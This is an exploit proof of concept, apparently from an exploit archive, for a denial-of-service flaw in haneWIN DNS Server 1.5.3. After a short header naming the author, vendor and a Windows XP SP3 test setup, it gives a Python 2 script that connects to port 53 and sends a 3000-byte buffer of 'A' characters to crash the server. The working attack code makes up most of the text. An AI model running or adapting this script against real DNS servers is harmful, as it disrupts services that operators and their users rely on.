########################################################### [~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service [~] Author: sajith [~] version: haneWIN DNS Server 1.5.3[~]Vendor Homepage: http://www.hanewin.net/[~] vulnerable app link:http://www.hanewin.net/dns-e.htm [~]Tested in windows Xp sp3 ########################################################### #POC by sajith shetty import socket target = "127.0.0.1"port = 53 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) buf = "A" * 3000request = buf s.send(request) data = s.recv(1024) print data except: print "DNS server is Down!"